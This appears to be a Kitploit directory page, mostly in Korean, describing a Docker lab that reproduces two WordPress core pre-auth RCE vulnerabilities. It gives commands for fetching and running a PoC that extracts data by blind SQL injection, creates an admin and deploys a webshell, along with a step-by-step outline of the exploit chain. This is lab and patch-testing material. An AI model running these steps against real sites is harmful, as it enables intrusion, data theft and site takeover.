Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-60137-and-CVE-2026-63030 — CVE-2026-60137 및 CVE-2026-63030 사전 인증 RCE를 재현하는 Docker 기반 WordPress 랩으로, SQLi, 권한 상승, 웹셸 배포를 위한 Python PoC 익스플로잇을 포함합니다. | Kitploit
도구/GitHubGitHub/ivanesk315/cve-2026-60137-and-cve-2026-63030
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & EducationPayload DevelopmentLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubivanesk315/cve-2026-60137-and-cve-2026-63030

CVE-2026-60137-and-CVE-2026-63030

CVE-2026-60137 및 CVE-2026-63030 사전 인증 RCE를 재현하는 Docker 기반 WordPress 랩으로, SQLi, 권한 상승, 웹셸 배포를 위한 Python PoC 익스플로잇을 포함합니다.

저장소 보기
18시간 32분 전아직 검토되지 않음

wp2shell Lab — CVE-2026-60137 & CVE-2026-63030

WordPress Core Pre-Auth RCE lab — 실제 익스플로잇, RCE 서버.

WARNING: Lab은 취약한 WordPress를 실행합니다. 인터넷에 노출하지 마세요.

구조

root@kitploit:~
.
├── docker-compose.yml     # Lab: WordPress 6.9.4 + MariaDB 11 + phpMyAdmin
├── exploit/               # PoC exploit (GitHub에서 clone)
│   └── wp2shell.py        # Full RCE exploit
├── REPORT.md              # Root cause 분석 보고서
└── README.md

Setup

1. Lab 시작

root@kitploit:~
docker compose up -d

로그에서 LAB READY가 보일 때까지 대기:

root@kitploit:~
docker compose logs -f wpcli

2. PoC exploit clone

root@kitploit:~
git clone https://github.com/0xsha/wp2shell.git exploit

이 exploit은:

  • Python 3.7+, pip install 필요 없음 (stdlib만 사용)
  • 비밀번호 크래킹 없이 새 admin 계정 생성
  • webshell 자동 배포
  • Interactive shell

3. 익스플로잇

root@kitploit:~
cd exploit

# Check vulnerability (non-destructive)
python wp2shell.py check http://localhost:8080

# Extract data qua blind SQLi
python wp2shell.py read http://localhost:8080 --preset users

# RCE — admin 생성 + webshell 배포 + command 실행
python wp2shell.py shell http://localhost:8080 --cmd id

# Interactive shell
python wp2shell.py shell http://localhost:8080 -i

Services

Exploit flow 요약

root@kitploit:~
1. POST /wp-json/batch/v1
   └─ Sub-request[0]: malformed path → parse error
   └─ Sub-request[1]: /wp/v2/posts + author_exclude=<SQLi>
   └─ Sub-request[2]: sacrificial route
   → $matches[] 인덱스 어긋남 → req[1]이 req[2]의 handler를 받음
   → permission_callback 우회 → WP_Query에 SQLi

2. SQL Injection (author__not_in)
   → Scalar string이 is_array() 검사 우회
   → Raw SQL이 WHERE clause에 inject

3. Object Hydration → oEmbed Write → Parent Loop Repair
   → Poisoned WP_Post 객체가 database에 persist

4. Changeset Privilege Escalation
   → WordPress가 current_user를 admin으로 switch

5. Nested REST Request
   → 새 admin 계정 생성 (비밀번호 크래킹 불필요)

6. Login + Upload webshell plugin → RCE

Verify patch

root@kitploit:~
# Update WordPress trong container
docker exec -it wp2shell-lab-wp-1 bash -c \
  "curl -sO https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \
   chmod +x wp-cli.phar && \
   ./wp-cli.phar core update --version=6.9.5 --allow-root"

# Re-run exploit — phải fail
python exploit/wp2shell.py check http://localhost:8080

Cleanup

root@kitploit:~
docker compose down -v

References

  • 0xsha/wp2shell — GitHub
  • Picus: wp2shell RCE Explained
  • zsec.uk: Code Trace Deep Dive
  • VulnCheck Blog
  • Tenable FAQ
도구 다운로드
ServiceURLCredentials
WordPresshttp://localhost:8080admin / Admin!2345
WP Adminhttp://localhost:8080/wp-adminadmin / Admin!2345
phpMyAdminhttp://localhost:8081root / root
REST APIhttp://localhost:8080/wp-json/—
Batch endpointhttp://localhost:8080/wp-json/batch/v1—